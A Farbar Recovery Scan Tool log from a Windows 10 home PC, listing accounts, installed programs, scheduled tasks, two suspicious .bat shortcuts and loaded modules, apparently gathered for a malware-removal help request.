C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-12-11 20:57

==================== End of FRST.txt ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-01-2017
Ran by Dorraine (13-01-2017 20:35:56)
Running from C:\Users\Dorraine\Downloads
Windows 10 Home Version 1607 (X64) (2016-09-27 01:10:09)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2694957348-435827945-4273115747-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2694957348-435827945-4273115747-503 - Limited - Disabled)
Dorraine (S-1-5-21-2694957348-435827945-4273115747-1000 - Administrator - Enabled) => C:\Users\Dorraine
Guest (S-1-5-21-2694957348-435827945-4273115747-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.023.20053 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.194 - Adobe Systems Incorporated)
Any Video Converter 6.0.7 (HKLM-x32\...\Any Video Converter) (Version: 6.0.7 - Anvsoft)
BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Copy (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Defraggler (HKLM\...\Defraggler) (Version: 2.19 - Piriform)
Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
DJ_AIO_03_F2200_Software_Min (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 17.4.33 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
F2200 (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Hearts Screen Saver (HKLM-x32\...\Hearts) (Version:  - )
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Deskjet F2200 All-In-One Driver Software 14.0 Rel. 6 (HKLM\...\{60D6AAC5-FDC1-49BA-867B-3135F4726156}) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.2024 - HP Photo Creations Powered by RocketLife)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
MarketResearch (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.43 - mIRC Co. Ltd.)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NewFreeScreensaver nfsSnowGlobe2 (HKLM-x32\...\Snow Globe 2 New Free Screensaver_is1) (Version:  - NewFreeScreensavers.com)
OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
OpenOffice 4.1.2 (HKLM-x32\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden
Spotify (HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Spotify) (Version: 1.0.28.87.g8f9312a4 - Spotify AB)
SpywareBlaster 5.5 (HKLM-x32\...\SpywareBlaster_is1) (Version: 5.5.0 - BrightFort LLC)
Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1206 - SUPERAntiSpyware.com)
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.59518 - TeamViewer)
Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
Windows Driver Package - Broadcom (k57nd) Net  (05/10/2011 14.8.0.5) (HKLM\...\6629B48C523118E251A0FF9A803F20EC1B1A9344) (Version: 05/10/2011 14.8.0.5 - Broadcom)
Windows Driver Package - Broadcom (k57nd60a) Net  (08/25/2012 15.4.0.9) (HKLM\...\E6C66B158167F5F97E7C3CC032E8B9CF807548D1) (Version: 08/25/2012 15.4.0.9 - Broadcom)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{087B3AE3-E237-4467-B8DB-5A38AB959AC9}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{3B092F0C-7696-40E3-A80F-68D74DA84210}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{63542C48-9552-494A-84F7-73AA6A7C99C1}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{7BC0E710-5703-45BE-A29D-5D46D8B39262}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\ooofilt_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{AE424E85-F6DF-4910-A6A9-438797986431}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\propertyhdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{C52AF81D-F7A0-4AAB-8E87-F80A60CCD396}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {01A58000-BA42-41CD-AA78-F9B4711E1807} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {09186449-4F69-4D44-AE36-EA2DBCFCF7D4} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {14EF3ED1-3A48-4E29-8661-AD0039797D76} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {21F8144E-8385-4FB5-8A93-41ECC6D63326} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {2FDD2155-71BB-429A-9A8F-78F4A259FDBD} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
Task: {313857CE-F959-4F91-BC7B-8277A3515412} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {3FD521FC-5F16-49A4-8F32-2343C0DCB866} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe
Task: {46C40E51-DCC9-49CE-898E-170CA5373F61} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {484686E2-A641-42BE-9D60-660116915CFC} - \CCleanerSkipUAC -> No File <==== ATTENTION
Task: {4BBB7A2E-49CB-4BF4-87CA-DEDAF4EC978E} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {4F03D14B-6E47-455B-83EA-E7A664B87E99} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {59B535FB-DCA8-41C6-9358-EAEAF710653D} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {63AC7C2E-1E01-4A02-84B0-1558549017E4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {67A22A2A-AA15-4F52-AD6A-062D6178B4C1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {6855ACB5-22ED-49E6-A845-551DD10C9A9E} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6F4ECD31-E3D7-4C10-B895-82E4C27AA3D0} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {7A59BCF6-FDB6-441C-AFCB-A13B00E6D086} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {7B7D2152-A018-4ECC-B82D-CCE1D62522A4} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {7F33D015-0655-46A8-B3DA-839C16E15F22} - System32\Tasks\{EF120DE6-BF35-43A2-B9B0-F60A443C2B68} => pcalua.exe -a "C:\Program Files (x86)\Xilisoft\YouTube Video Converter\Uninstall.exe"
Task: {815BA402-E344-4BD4-AE42-0CF840DD3A79} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {81E5946D-A837-4EA1-B26C-3B4F71FD0B3D} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {8CA4CABA-7807-41BC-AAB6-00049AC72548} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {8EF7886D-4812-492B-BADC-02DBDCEB3F5A} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {9FFE5BAE-9E2D-4624-AA2B-DE15303E7A79} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A1D5324F-47C6-4530-8824-C6B4E5EC401F} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A6614028-9517-4EEE-BACC-B097F2B1A56F} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {AD28BEBC-2AED-40E8-B7C6-06EBFF9F32B1} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {B2AE284D-9DD9-442A-A349-D5F4A4AD0844} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {B4A2EC81-1C16-4D3E-9275-A302BE1F49C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B4D9E1EA-D74E-4E70-BE88-E87448FEB212} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {B6845A6F-8D15-4217-AEC1-11704CC32EE1} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {B83E3A53-FCDF-4B31-98AC-DB794D28C910} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C7F3E5CE-282C-4D59-97CE-2CC1A0287DE7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {C9ED5E49-9E11-4673-82F4-8D342CE058E1} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {CD0C4A4F-7934-4C1C-B5B7-100C05A17EAF} - System32\Tasks\{34CBDC00-3CBA-4835-BC55-E95FC3A0F944} => pcalua.exe -a C:\Users\Dorraine\Downloads\bouncy_snowmen.exe -d C:\Users\Dorraine\Downloads
Task: {CD2C8A99-3A16-49FE-A426-5A21F0049B28} - \Microsoft\Windows\Setup\gwx\rundetector -> No File <==== ATTENTION
Task: {D7D53338-C725-4562-B365-F5547223869C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-01-11] (Adobe Systems Incorporated)
Task: {E1A55A6B-AF6A-4FBD-BA0E-F32178F5A63C} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
Task: {E1DA30AF-E430-47F4-A4A3-0D03A968574D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {E81B0FC1-BB37-4629-964D-9979EA8D3555} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {EB022CFD-2B91-4BE4-BF5A-BB26BEB9DE8B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {F083E0F2-9ED4-4AC1-A705-073D81C43930} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F20BC99F-B740-4C9E-8EB7-371A89231811} - System32\Tasks\Microsoft\Windows\Setup\UpgradeTriggers\UpgradeNowTask => C:\WINDOWS\System32\GWX\GWXUXWorker.exe
Task: {F2575FD3-6D7D-4BC1-9BFF-3DA6F2E10777} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {F305E9EB-6B8E-483E-A859-144C5B87F227} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {F8C0FB64-4C7D-4CFB-8D81-D74199DDACA8} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {FDC49832-2BBA-446B-B0E9-488A6F92E85F} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk -> C:\Users\Dorraine\AppData\Local\7df78865\b9023127.bat ()
Shortcut: C:\Users\Dorraine\AppData\Local\360fd\41727.lnk -> C:\Users\Dorraine\AppData\Local\360fd\cf9bd.bat ()

==================== Loaded Modules (Whitelisted) ==============

2016-07-16 06:42 - 2016-07-16 06:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-26 20:16 - 2016-09-26 20:16 - 01864384 _____ () C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\amd64\ClientTelemetry.dll
2016-09-26 23:41 - 2016-09-26 23:41 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-12-13 22:59 - 2016-12-09 04:41 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-12-13 22:59 - 2016-12-09 04:40 - 00693248 _____ () C:\Windows\ShellExperiences\MtcUvc.dll
2016-11-08 20:51 - 2016-11-02 05:21 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-11-08 20:51 - 2016-11-02 05:15 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-11-08 20:51 - 2016-11-02 05:14 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-11-08 20:51 - 2016-11-02 05:15 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-11-08 20:51 - 2016-11-02 05:16 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-11-08 20:51 - 2016-11-02 05:17 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-12-14 02:14 - 2016-12-14 02:15 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.145.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2016-12-14 02:14 - 2016-12-14 02:15 - 00179712 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.145.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-12-14 02:14 - 2016-12-14 02:15 - 42130432 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.145.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2016-12-14 02:14 - 2016-12-14 02:15 - 02216448 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.145.0_x64__kzf8qxf38zg5c\roottools.dll
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2017-01-11 17:07 - 2016-12-07 20:00 - 00035792 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2017-01-11 17:07 - 2016-12-07 20:00 - 00145864 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2017-01-11 17:06 - 2016-12-07 20:01 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2017-01-11 17:07 - 2016-12-07 20:00 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2017-01-11 17:07 - 2016-12-07 20:04 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2017-01-11 17:07 - 2016-12-07 20:00 - 00100296 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2017-01-11 17:07 - 2016-12-07 20:04 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2017-01-11 17:07 - 2016-12-07 20:00 - 00018888 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00019776 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2017-01-11 17:07 - 2016-12-07 20:00 - 00694224 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2017-01-11 17:06 - 2017-01-05 19:03 - 00020824 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2017-01-11 17:07 - 2016-12-07 20:01 - 00123856 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2017-01-11 17:06 - 2017-01-05 19:03 - 01682768 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2017-01-11 17:06 - 2017-01-05 19:03 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00021328 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.crt.compiled._winffi_crt.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00052032 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2017-01-11 17:06 - 2017-01-05 19:04 - 00038712 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2017-01-11 17:07 - 2016-12-07 20:00 - 00392144 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2017-01-11 17:06 - 2016-12-07 20:04 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2017-01-11 17:07 - 2016-12-07 20:04 - 00116176 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00381760 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2017-01-11 17:07 - 2016-12-07 20:04 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00025432 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.kernel32.compiled._winffi_kernel32.pyd
2017-01-11 17:07 - 2016-12-07 20:04 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2017-01-11 17:07 - 2016-12-07 20:04 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2017-01-11 17:07 - 2016-12-07 20:04 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2017-01-11 17:07 - 2016-12-07 20:04 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2017-01-11 17:07 - 2016-12-07 20:04 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2017-01-11 17:07 - 2016-12-07 20:04 - 00057808 _____ () C:\Program Files (x86)\Dropbox\Client\win32evtlog.pyd
2017-01-11 17:07 - 2016-12-07 20:04 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2017-01-11 17:06 - 2017-01-05 19:03 - 00246608 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2017-01-11 17:06 - 2017-01-05 19:03 - 00026464 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox.infinite.win.compiled._driverinstallation.pyd
2017-01-11 17:07 - 2016-12-07 20:02 - 00241104 _____ () C:\Program Files (x86)\Dropbox\Client\_jpegtran.pyd
2017-01-11 17:06 - 2017-01-05 19:03 - 00020288 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2017-01-11 17:07 - 2016-12-07 20:04 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00023384 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.iphlpapi._winffi_iphlpapi.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00019792 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winerror._winffi_winerror.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00020808 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.wininet._winffi_wininet.pyd
2017-01-11 17:07 - 2016-12-07 20:04 - 00350152 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00022360 _____ () C:\Program Files (x86)\Dropbox\Client\winverifysignature.compiled._VerifySignature.pyd
2017-01-11 17:06 - 2017-01-05 19:04 - 00024400 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2017-01-11 17:06 - 2016-12-07 19:57 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2017-01-11 17:06 - 2017-01-05 19:04 - 00031576 _____ () C:\Program Files (x86)\Dropbox\Client\enterprise_data.compiled._enterprise_data.pyd
2017-01-11 17:06 - 2016-12-21 21:04 - 00293392 _____ () C:\Program Files (x86)\Dropbox\Client\EnterpriseDataAdapter.dll
2017-01-11 17:06 - 2017-01-05 19:03 - 00084288 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
2017-01-11 17:07 - 2017-01-05 19:04 - 01826104 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2017-01-11 17:07 - 2016-12-07 20:01 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00531264 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 03928896 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 01972536 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00133432 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00224064 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00207680 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00020296 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.user32._winffi_user32.pyd
2017-01-11 17:06 - 2016-12-07 20:08 - 00017864 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2017-01-11 17:06 - 2016-12-07 20:08 - 01631184 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2017-01-11 17:07 - 2017-01-05 19:04 - 00042816 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebChannel.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00171336 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebEngineWidgets.pyd
2017-01-11 17:07 - 2017-01-05 19:04 - 00357688 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd
